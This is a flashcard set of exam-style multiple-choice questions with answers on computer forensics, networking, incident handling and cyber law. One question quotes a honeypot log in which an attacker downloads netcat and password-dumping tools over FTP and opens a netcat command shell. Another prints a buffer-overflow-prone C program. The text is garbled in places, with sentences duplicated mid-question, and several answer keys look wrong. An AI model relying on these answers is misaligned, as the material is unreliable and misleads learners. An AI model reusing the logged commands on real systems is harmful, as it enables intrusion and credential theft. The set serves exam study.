CFIH_CL_Set_2

अब Quizwiz के साथ अपने होमवर्क और परीक्षाओं को एस करें!

111 ( Topic 2) Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM file on a computer. Where should Harold navigate on the computer to find the file? A. %systemroot%\LSA B. %systemroot%\system32\drivers\etc C. %systemroot%\repair D. %systemroot%\system32\LSA

C. %systemroot%\repair

156 ( Topic 2) If an attacker's computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response? A. 31402 B. The zombie will not send a response C. 31401 D. 31399

C. 31401

134 ( Topic 2) How many possible sequence number combinations are there in TCP/IP protocol? A. 320 billion B. 1 billion C. 4 billion D. 32 million

C. 4 billion

133 ( Topic 2) When investigating a Windows System, it is important to view the contents of the page or swap file because: A. Windows stores all of the systems configuration information in this file B. This is file that windows use to communicate directly with Registry C. A Large volume of data can exist within the swap file of which the computer user has no knowledge D. This is the file that windows use to store the history of the last 100 commands that were run from the command line

C. A Large volume of data can exist within the swap file of which the computer user has no knowledge

196 ( Topic 2) Melanie was newly assigned to an investigation and asked to make a copy of all the evidence from the compromised system. Melanie did a DOS copy of all the files on the system. What would be the primary reason for you to recommend a disk imaging tool? A. A disk imaging tool would check for CRC32s for internal self checking and validation and have MD5 checksum B. Evidence file format will contain case data entered by the examiner and encrypted at the beginning of the evidence file C. A simple DOS copy will not include deleted files, file slack and other information D. There is no case for an imaging tool as it will use a closed, proprietary format that if compared to the original will not match up sector for sector

C. A simple DOS copy will not include deleted files, file slack and other information

115 ( Topic 2) What feature of Windows is the following command trying to utilize? A. White space B. AFS C. ADS D. Slack file

C. ADS

193 ( Topic 2) Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate. He knows he needs to allow FTP traffic to one of the servers on his network, but he wants to only allow FTP-PUT. Which firewall would be most appropriate for Harold? needs? A. Packet filtering firewall B. Circuit-level proxy firewall C. Application-level proxy firewall D. Data link layer firewall

C. Application-level proxy firewall

143 ( Topic 2) Kyle is performing the final testing of an application he developed for the accounting department. His last round of testing is to ensure that the program is as secure as possible. Kyle runs the following command. What is he testing at this point? #include #include int main(int argc, char *argv[]) { char buffer[10]; if (argc < 2) { fprintf (stderr, "USAGE: %s string\n", argv[0]); return 1; } strcpy(buffer, argv[1]); return 0; } A. SQL injection B. Format string bug C. Buffer overflow D. Kernal injection

C. Buffer overflow

173 ( Topic 2) Printing under a Windows Computer normally requires which one of the following files types to be created? A. EME B. MEM C. EMF D. CME

C. EMF

101 ( Topic 2) This is the original file structure database that Microsoft originally designed for floppy disks. It is written to the outermost track of a disk and contains information about each file stored on the drive. A. Master Boot Record (MBR) B. Master File Table (MFT) C. File Allocation Table (FAT) D. Disk Operating System (DOS)

C. File Allocation Table (FAT) Explanation: A MBR is usually found on fixed disks, not floppy. A MFT is part of NTFS, and NTFS is not used on floppy DOS is an operating system, not a file structure database

189 ( Topic 2) A packet is sent to a router that does not have the packet destination address in its route table, how will the packet get to its properA packet is sent to a router that does not have the packet? destination address in its route table, how will the packet get to its proper destination? A. Border Gateway Protocol B. Root Internet servers C. Gateway of last resort D. Reverse DNS

C. Gateway of last resort

113 ( Topic 2) What stage of the incident handling process involves reporting events? A. Containment B. Follow-up C. Identification D. Recovery

C. Identification

148 ( Topic 2) When operating systems mark a cluster as used but not allocated, the cluster is considered as _________ A. Corrupt B. Bad C. Lost D. Unallocated

C. Lost

150 ( Topic 2) When investigating a wireless attack, what information can be obtained from the DHCP logs? A. The operating system of the attacker and victim computersThe operating system of the attacker and victim? computers B. IP traffic between the attacker and the victim C. MAC address of the attacker If any computers on the network are running in promiscuous mode

C. MAC address of the attacker If any computers on the network are running in promiscuous mode

146 ( Topic 2) Where is the startup configuration located on a router? A. Static RAM B. BootROM C. NVRAM D. Dynamic RAM

C. NVRAM

176 ( Topic 2) Harold is finishing up a report on a case of network intrusion, corporate spying, and embezzlement that he has been working on for over six months. He is trying to find the right term to use in his report to describe network-enabled spying. What term should Harold use? A. Spycrack B. Spynet C. Netspionage D. Hackspionage

C. Netspionage

158 ( Topic 2) When monitoring for both intrusion and security events between multiple computers, it is essential that the computers' clocks are synchronized. Synchronized time allows an administrator to reconstruct what took place during an attack against multiple computers. Without synchronized time, it is very difficult to determine exactly when specific events took place, and how events interlace. What is the name of the service used to synchronize time among multiple computers? A. Time-Sync Protocol B. SyncTime Service C. Network Time Protocol D. Universal Time Set

C. Network Time Protocol

106 ( Topic 2) Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers many different programming as well as networking languages. What networking protocol language should she learn that routers utilize? A. BPG B. ATM C. OSPF D. UDP

C. OSPF

198 ( Topic 2) Michael works for Kimball Construction Company as senior security analyst. As part of yearly security audit, Michael scans his network for vulnerabilities. Using Nmap, Michael conducts XMAS scan and most of the ports scanned do not give a response. In what state are these ports? A. Filtered B. Closed C. Open D. Stealth

C. Open

110 ( Topic 2) A law enforcement officer may only search for and seize criminal evidence with _______________________, which are facts or circumstances that would lead a reasonable person to believe a crime has been committed or is about to be committed, evidence of the specific crime exists and the evidence of the specific crime exists at the place to be searched. A. Mere Suspicion B. A preponderance of the evidence C. Probable cause D. Beyond a reasonable doubt

C. Probable cause Explanation: A preponderance of the evidence is the proof requirement in a civil case Beyond a reasonable doubt is the proof requirement in a criminal case

184 ( Topic 2) George is a senior security analyst working for a state agency in Florida. His state's congress just passed a bill mandating every state agency to undergo a security audit annually. After learning what will be required, George needs to implement an IDS as soon as possible before the first audit occurs. The state bill requires that an IDS with a "time- based induction machine" be used. What IDS feature must George implement to meet this requirement? A. Pattern matching B. Statistical-based anomaly detection C. Real-time anomaly detection D. Signature-based anomaly detection

C. Real-time anomaly detection

195 ( Topic 2) Julia is a senior security analyst for Berber Consulting group. She is currently working on a contract for a small accounting firm in Florida. They have given her permission to perform social engineering attacks on the company to see if their in-house training did any good. Julia calls the main number for the accounting firm and talks to the receptionist. Julia says that she is an IT technician from the company's main office in Iowa. She states that she needs the receptionist's network username and password to troubleshoot a problem they are having. Julia says that Bill Hammond, the CEO of the company, reQuested this information. After hearing the name of the CEO, the receptionist gave Julia all the information she asked for. What principal of social engineering did Julia use? A. Social Validation B. Friendship/Liking C. Reciprocation D. Scarcity

C. Reciprocation

157 ( Topic 2) In the following email header, where did the email first originate from? A. Somedomain.com B. Smtp1.somedomain.com C. Simon1.state.ok.gov.us D. David1.state.ok.gov.us

C. Simon1.state.ok.gov.us

177 ( Topic 2) You have been asked to investigate after a user has reported a threatening e-mail they have received from an external source. Which of the following are you most interested in when trying to trace the source of the message? A. The X509 Address B. The SMTP reply Address C. The E-mail Header D. The Host Domain Name

C. The E-mail Header

144 ( Topic 2) The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given? A. It is a local exploit where the attacker logs in using username johna2k B. There are two attackers on the system - johna2k and haxedj00 C. The attack is a remote exploit and the hacker downloads three files D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

C. The attack is a remote exploit and the hacker downloads three files Explanation: Explanation: The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.

147 ( Topic 2) Why would a company issue a dongle with the software they sell? A. To provide source code protection B. To provide wireless functionality with the software C. To provide copyright protection D. To ensure that keyloggers cannot be used

C. To provide copyright protection

171 ( Topic 2) You are working for a large clothing manufacturer as a computer forensics investigator and are called in to investigate an unusual case of an employee possibly stealing clothing designs from the company and selling them under a different brand name for a different company. What you discover during the course of the investigation is that the clothing designs are actually original products of the employee and the company has no policy against an employee selling his own designs on his own time. The only thing that you can find that the employee is doing wrong is that his clothing design incorporates the same graphic symbol as that of the company with only the wording in the graphic being different. What area of the law is the employee violating? A. Copyright law B. Brandmark law C. Trademark law D. Printright law

C. Trademark law

116 ( Topic 2) An employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the employee computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to astored on the employee? computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before leaving work for the weekend. You detain the employee before he leaves the building and recover the floppy disk and secure his computer. Will you be able to break the encryption so that you can verify that the employee was in possession of the proprietary information? A. EFS uses a 128-bit key that cannot be cracked, so you will not be able to recover the information B. The EFS Revoked Key Agent can be used on the computer to recover the information C. When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information D. When the encrypted file was copied to the floppy disk, the EFS private key was also copied to the floppy disk, so you can recover the information

C. When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information

180 ( Topic 2) In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case? A. evidence must be handled in the same way regardless of the type of case B. evidence procedures are not important unless you work for a law enforcement agency C. evidence in a criminal case must be secured more tightly than in a civil case D. evidence in a civil case must be secured more tightly than in a criminal case

C. evidence in a criminal case must be secured more tightly than in a civil case

188 ( Topic 2) During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore you report this evidence. This type of evidence is known as: A. Inculpatory evidence B. mandatory evidence C. exculpatory evidence D. Terrible evidence

C. exculpatory evidence

152 ( Topic 2) What is the target host IP in the following command? C:\> firewalk -F 80 10.10.150.1 172.16.28.95 -p UDP A. 10.10.150.1 B. This command is using FIN packets, which cannot scan target hosts C. Firewalk does not scan target hosts D. 172.16.28.95

D. 172.16.28.95

136 ( Topic 2) Which response organization tracks hoaxes as well as viruses? A. NIPC B. FEDCIRC C. CERT D. CIAC

D. CIAC Explanation: Note: CIAC (Computer Incident Advisory Capability) Was run by the US Department of energy

186 ( Topic 2) What type of attack occurs when an attacker can force a router to stop forwarding packets by flooding the router with many open connections simultaneously so that all the hosts behind the router are effectively disabled? A. ARP redirect B. Physical attack C. Digital attack D. Denial of service

D. Denial of service

197 ( Topic 2) After undergoing an external IT audit, George realizes his network is vulnerable to DDoS attacks. What countermeasures could he take to prevent DDoS attacks? A. Enable BGP B. Enable direct broadcasts C. Disable BGP D. Disable direct broadcasts

D. Disable direct broadcasts

155 ( Topic 2) The objective of this act was to protect consumers personal financial information held by financial institutions and their service providers. A. HIPAA B. Sarbanes-Oxley 2002 C. California SB 1386 D. Gramm-Leach-Bliley Act

D. Gramm-Leach-Bliley Act

199 ( Topic 2) John and Hillary works at the same department in the company. John wants to find out Hillary's network password so he can take a look at her documents on the file server. He enables Lophtcrack program to sniffing mode. John sends Hillary an email with a link to Error! Reference source not found. What information will he be able to gather from this? A. The SID of Hillary network account B. The SAM file from Hillary computer C. The network shares that Hillary has permissions D. Hillary network username and password hash

D. Hillary network username and password hash Explanation: Note: From the question, we would have to assume that John is not the Administrator, since he needs to run L0phtcrack in sniffing mode. But what if the company is using switches instead of Hubs? John would either try to degarde the switch or perform a man in the middle attack.

135 ( Topic 2) You are a security analyst performing reconnaissance on a company you will be carrying out a penetration test for. You conduct a search for IT jobs on Dice.com and find the following information for an open position: 7+ years experience in Windows Server environment 5+ years experience in Exchange 2000/2003 environment Experience with Cisco Pix Firewall, Linksys 1376 router, Oracle 11i and MYOB v3.4 Accounting software are reQuired MCSA desired, MCSE, CEH preferred No Unix/Linux Experience needed What is this information posted on the job website considered? A. Trade secret B. Social engineering exploit C. Competitive exploit D. Information vulnerability

D. Information vulnerability

105 ( Topic 2) What binary coding is used most often for e-mail purposes? A. SMTP B. Uuencode C. IMAP D. MIME

D. MIME

121 ( Topic 2) You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question wheather evidence has been changed while at the lab. What can you do to prove that the evidence is the same as it was when it first entered the lab? A. Sign a statement attesting that the evidence is the same as it was when it entered the lab B. There is no reason to worry about this possible claim because state labs are certified C. Make MD5 hashes of the evidence and compare it to the standard database developed by NIST D. Make MD5 hashes of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab

D. Make MD5 hashes of the evidence and compare it with the original MD5 hash that was taken when the evidence first entered the lab

140 ( Topic 2) You are running known exploits against your network to test for possible vulnerabilities. To test the strength of your virus software, you load a test network to mimic your production network. Your software successfully blocks some simple macro and encrypted viruses. You decide to really test the software by using virus code where the code rewrites itself entirely and the signatures change from child to child, but the functionality stays the same. What type of virus is this that you are testing? A. Oligomorhic B. Transmorphic C. Polymorphic D. Metamorphic

D. Metamorphic

153 ( Topic 2) Bill is the accounting manager for Grummon and Sons LLC in Chicago. On a regular basis, he needs to send PDF documents containing sensitive information through E-mail to his customers. Bill protects the PDF documents with a password and sends them to their intended recipients. Why PDF passwords do not offer maximum protection? A. PDF passwords are converted to clear text when sent through E-mail B. PDF passwords are not considered safe by Sarbanes-Oxley C. When sent through E-mail, PDF passwords are stripped from the document completely D. PDF passwords can easily be cracked by software brute force tools

D. PDF passwords can easily be cracked by software brute force tools

123 ( Topic 2) When using Windows acquisitions tools to acquire digital evidence, it is important to use a well-tested hardware write-blocking device to _________ A. Automate collection from image files B. Avoiding copying data from the boot partition C. Acquire data from the host-protected area on a disk D. Prevent contamination to the evidence drive

D. Prevent contamination to the evidence drive

126 ( Topic 2) Using Linux to carry out a forensics investigation, what would the following command accomplish? dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror A. Search for disk errors within an image file B. Backup a disk to an image file C. Copy a partition to an image file D. Restore a disk from an image file

D. Restore a disk from an image file

191 ( Topic 2) Which of the following refers to the data that might still exist in a cluster even though the original file has been overwritten by another file? A. Sector B. Metadata C. MFT D. Slack Space

D. Slack Space

124 ( Topic 2) What type of analysis helps to identify the time and sequence of events in an investigation? A. Time-based B. Functional C. Relational D. Temporal

D. Temporal

102 ( Topic 2) Madison is on trial for allegedly breaking into her university internal network. The police raided her dorm room and seized all of her computerMadison is on trial for allegedly breaking into her university? internal network. The police raided her dorm room and seized all of her computer equipment. Madison lawyer is trying to convince the judge that the seizure was unfounded and baseless. Under which US Amendment isequipment. Madison? lawyer is trying to convince the judge that the seizure was unfounded and baseless. Under which US Amendment is Madison lawyer trying to prove the police violated?Madison? lawyer trying to prove the police violated? A. The 10th Amendment B. The 5th Amendment C. The 1st Amendment D. The 4th Amendment

D. The 4th Amendment

139 ( Topic 2) Why would you need to find out the gateway of a device when investigating a wireless attack? A. The gateway will be the IP of the proxy server used by the attacker to launch the attack B. The gateway will be the IP of the attacker computerThe gateway will be the IP of the attacker? computer C. The gateway will be the IP used to manage the RADIUS server D. The gateway will be the IP used to manage the access point

D. The gateway will be the IP used to manage the access point

170 ( Topic 2) You are working as an investigator for a corporation and you have just received instructions from your manager to assist in the collection of 15 hard drives that are part of an ongoing investigation. Your job is to complete the required evidence custody forms to properly document each piece of evidence as other members of your team collect it. Your manager instructs you to complete one multi-evidence form for the entire case and a single-evidence form for each hard drive. How will these forms be stored to help preserve the chain of custody of the case? A. All forms should be placed in an approved secure container because they are now primary evidence in the case B. The multi-evidence form should be placed in an approved secure container with the hard drives and the single-evidence forms should be placed in the report file C. All forms should be placed in the report file because they are now primary evidence in the case D. The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container

D. The multi-evidence form should be placed in the report file and the single-evidence forms should be kept with each hard drive in an approved secure container

182 ( Topic 2) When an investigator contacts by telephone the domain administrator or controller listed by a whois lookup to request all e-mails sent and received for a user account be preserved, what U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records? A. Title 18, Section 1030 B. Title 18, Section 2703(d) C. Title 18, Section Chapter 90 D. Title 18, Section 2703(f)

D. Title 18, Section 2703(f) Explanation: 18 U.S.C. 1029 Fraud and Related Activity in Connection with Access Devices 18 U.S.C. 1030 Fraud and Related Activity in Connection with Computers 18 U.S.C. 2703 Required Disclosure of Customer Communications Records 18 U.S.C. 2703(d) Requirements for Court Order 18 U.S.C. 2703(f) Requirement to Preserve Evidence

183 ( Topic 2) What is considered a grant of a property right given to an individual who discovers or invents a new machine, process, useful composition of matter or manufacture? A. Copyright B. Design patent C. Trademark D. Utility patent

D. Utility patent

145 ( Topic 2) To calculate the number of bytes on a disk, the formula is: CHS** A. number of circles x number of halves x number of sides x 512 bytes per sector B. number of cylinders x number of halves x number of shims x 512 bytes per sector C. number of cells x number of heads x number of sides x 512 bytes per sector D. number of cylinders x number of heads x number of sides x 512 bytes per sector

D. number of cylinders x number of heads x number of sides x 512 bytes per sector Explanation: Although D in this question is probably the closest, the answer may have been transcribed incorrectly. CHS stands for Cylinder Head Sector, and S is not sides. Each side of a platter of a disk has its own head. A cylinder is an alignment of all tracks under one head position. So the answer is number of cylinders x number of heads x number of sectors (per track) x 512 bytes per sector (assuming that is the sector size as some disks may have larger sector sizes). The number of tracks per side of disk, or the number of tracks that a single head can access is equal to the number of cylinders.

119 ( Topic 2) Before you are called to testify as an expert, what must an attorney do first? A. engage in damage control B. prove that the tools you used to conduct your examination are perfect C. read your curriculum vitae to the jury D. qualify you as an expert witness

D. qualify you as an expert witness

118 ( Topic 2) What method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 server the course of its lifetime? A. forensic duplication of hard drive B. analysis of volatile data C. comparison of MD5 checksums D. review of SIDs in the Registry

D. review of SIDs in the Registry Explanation: Not MD5: MD5 checksums are used as integrity checks User accounts are assigned a unique SID, and the SID are not reused.

166 ( Topic 2) How many bits is Source Port Number in TCP Header packet? A. 16 B. 48 C. 32 D. 64

A. 16

141 ( Topic 2) You setup SNMP in multiple offices of your company. Your SNMP software manager is not receiving data from other offices like it is for your main office. You suspect that firewall changes are to blame. What ports should you open for SNMP to work through Firewalls (Select 2) A. 161 B. 162 C. 163 D. 160

A. 161 B. 162

159 ( Topic 2) One way to identify the presence of hidden partitions on a suspect hard drive is to:One way to identify the presence of hidden partitions on a suspect? hard drive is to: A. Add up the total size of all known partitions and compare it to the total size of the hard drive B. Examine the FAT and identify hidden partitions by noting an ?in the artition Type?fieldExamine the FAT and identify hidden partitions by noting an ??in the ?artition Type?field C. Examine the LILO and note an ?in the artition Type?fieldExamine the LILO and note an ??in the ?artition Type?field It is not possible to have hidden partitions on a hard drive

A. Add up the total size of all known partitions and compare it to the total size of the hard drive

114 ( Topic 2) The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. (Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.) Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 From the options given below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 A. An IDS evasion technique B. A buffer overflow attempt C. A DNS zone transfer D. Data being retrieved from 63.226.81.13

A. An IDS evasion technique

137 ( Topic 2) The rule of thumb when shutting down a system is to pull the power plug. However, it has certain drawbacks. Which of the following would that be? A. Any data not yet flushed to the system will be lost B. All running processes will be lost C. The /tmp directory will be flushed D. Power interruption will corrupt the pagefile

A. Any data not yet flushed to the system will be lost B. All running processes will be lost Explanation: Volitile memory will be lost. Data is not flushed to the system, it is flushed to the disk.

190 ( Topic 2) You are working as an independent computer forensics investigator and receive a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer Lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a implePC in the Computer Lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a ?imple backup copy?of the hard drive in the PC and put it on this drive and requests that you examine the drive for evidence of the suspected images. You inform him that a imple backup copy?will not provide deleted files or recover file fragments. What type of copy do you need to make toYou inform him that a ?imple backup copy?will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceedings? A. Bit-stream copy B. Robust copy C. Full backup copy D. Incremental backup copy

A. Bit-stream copy

172 ( Topic 2) You have compromised a lower-level administrator account on an Active Directory network of a small company in Dallas, Texas. You discover Domain Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe. What are you trying to accomplish here? A. Enumerate domain user accounts and built-in groups B. Enumerate MX and A records from DNS C. Establish a remote connection to the Domain Controller D. Poison the DNS records with false records

A. Enumerate domain user accounts and built-in groups

160 ( Topic 2) John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After analyzing the sniffer log files, he does not see any of the traffic produced by Firewalk. Why is that? A. Firewalk sets all packets with a TTL of one B. Firewalk sets all packets with a TTL of zero C. Firewalk cannot pass through Cisco firewalls D. Firewalk cannot be detected by network sniffers

A. Firewalk sets all packets with a TTL of one

167 ( Topic 2) What type of attack sends spoofed UDP packets (instead of ping packets) with a fake source address to the IP broadcast address of a large network? A. Fraggle B. Smurf scan C. SYN flood D. Teardrop

A. Fraggle

131 ( Topic 2) Using Internet logging software to investigate a case of malicious use of computers, the investigator comes across some entries that appear odd. From the log, the investigator can see where the person in question went on the Internet. From the log, it appears that the user was manually typing in different user ID numbers. What technique this user was trying? A. Parameter tampering B. Cross site scripting C. SQL injection D. Cookie Poisoning Cookie Poisoning

A. Parameter tampering

149 ( Topic 2) What will the following command accomplish in Linux? fdisk /dev/hda A. Partition the hard drive B. Format the hard drive C. Delete all files under the /dev/hda folder D. Fill the disk with zeros

A. Partition the hard drive

142 ( Topic 2) Law enforcement officers are conducting a legal search for which a valid warrant was obtained. While conducting the search, officers observe an item of evidence for an unrelated crime that was not included in the warrant. The item was clearly visible to the officers and immediately identified as evidence. What is the term used to describe how this evidence is admissible? A. Plain view doctrine B. Corpus delicti C. Locard Exchange Principle D. Ex Parte Order

A. Plain view doctrine

187 ( Topic 2) When you carve an image, recovering the image depends on which of the following skills? A. Recognizing the pattern of the header content B. Recovering the image from a tape backup C. Recognizing the pattern of a corrupt file D. Recovering the image from the tape backup

A. Recognizing the pattern of the header content

163 ( Topic 2) On an Active Directory network using NTLM authentication, where on the domain controllers are the passwords stored? A. SAM B. AMS C. Shadow file D. Password.conf

A. SAM

179 ( Topic 2) Windows identifies which application to open a file with by examining which of the following? A. The File extension B. The file attributes C. The file Signature at the end of the file D. The file signature at the beginning of the file

A. The File extension

174 ( Topic 2) A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker . Given below is an excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by studying the log. Please note that you are required to infer only what is explicit in the excerpt. (Note: The student is being tested on concepts learnt during passive OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures from a sniff dump.) 03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111 TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23678634 2878772 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= += 03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111 UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84 Len: 64 - 01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ................ 00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................ 00 00 00 11 00 00 00 00 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= += 03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773 UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104 Len: 1084 - 47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8 G..c............ 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3A B1 5E E5 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.^.....localhost =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= +=+=+ 03/15-20:21:36.539731 211.185.125.124:4450 -> 172.16.1.108:39168 TCP TTL:43 TOS:0x0 ID:31660 IpLen:20 DgmLen:71 DF ***AP*** Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 23679878 2880015 63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 cd /; uname -a; 69 64 3B id; A. The attacker has conducted a network sweep on port 111 B. The attacker has scanned and exploited the system using Buffer Overflow C. The attacker has used a Trojan on port 32773 D. The attacker has installed a backdoor

A. The attacker has conducted a network sweep on port 111

130 ( Topic 2) In a virtual test environment, Michael is testing the strength and security of BGP using multiple routers to mimic the backbone of the Internet. This project will help him write his doctoral thesis on "bringing down the Internet". Without sniffing the traffic between the routers, Michael sends millions of RESET packets to the routers in an attempt to shut one or all of them down. After a few hours, one of the routers finally shuts itself down. What will the other routers communicate between themselves? A. The change in the routing fabric to bypass the affected router B. More RESET packets to the affected router to get it to power back up C. STOP packets to all other routers warning of where the attack originated D. RESTART packets to the affected router to get it to power back up

A. The change in the routing fabric to bypass the affected router

112 ( Topic 2) Why is it still possible to recover files that have been emptied from the Recycle Bin on a Windows computer? A. The data is still present until the original location of the file is used B. The data is moved to the Restore directory and is kept there indefinitely C. The data will reside in the L2 cache on a Windows computer until it is manually deleted D. It is not possible to recover data that has been emptied from the Recycle Bin

A. The data is still present until the original location of the file is used

154 ( Topic 2) You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensics lab due to sensitivity of the case. How would you permanently erase the data on the hard disk? A. Throw the hard disk into the fire B. Run the powerful magnets over the hard disk C. Format the hard disk multiple times using a low level disk utility D. Overwrite the contents of the hard disk with Junk data

A. Throw the hard disk into the fire C. Format the hard disk multiple times using a low level disk utility Explanation: To be effective with throwing the hard drive into the fire, the fire would have to be hot enough to melt the platters into molten metal, which requires an industrial furnance. This requires special facilities. Running powerful magnets over the disk, such as degaussing the disk, may destroy the data, but may also be ineffective. In some cases, the degaussing process for tape and disk may render the disk unusable for use again. (of course throwing the drives into a furnance also guarantee that as well). Formatting the disk multiple times with a low level disk utility is the best way to go, and still beable to re-use the disk for later projects. The keys are multiple and low level. A low level format is typicall a slow, thorough, format that is a wipe. Multiple as opposed to once is recommended. There is a theory on how many times, some schools say at least three times. The problem with this answer is that with newer drives, such as ATA and SCSI, low level formats can destroy the volumes as well, and some BIOS may actually ignore the LLF directives. Overwritting the disk with junk data would perform some form of wipe because the old data is wiped out, but still may be recoverd. Note: According to some websites: Physical Methods that will not work to destroy data on a hard drive include:Throwing it in the water (this does not do much)Setting it on fire (the temperature is not going to be high enough at home)Throwing it out of the window. Hard drives can take quite a bit of G force. They are not heavy so the impact of the hard drive on the ground is not likely to destroy the platters.Drive over the hard drive. A car, or even a tank, driving over a hard drive will do nothing, any more than they would driving over a book. Unless the drive is actually flattened, the platters are not going to be destroyed

175 ( Topic 2) When obtaining a warrant it is important to: A. particularly describe the place to be searched and particularly describe the items to be seized B. generally describe the place to be searched and particularly describe the items to be seized C. generally describe the place to be searched and generally describe the items to be seized D. particularly describe the place to be searched and generally describe the items to be seized

A. particularly describe the place to be searched and particularly describe the items to be seized

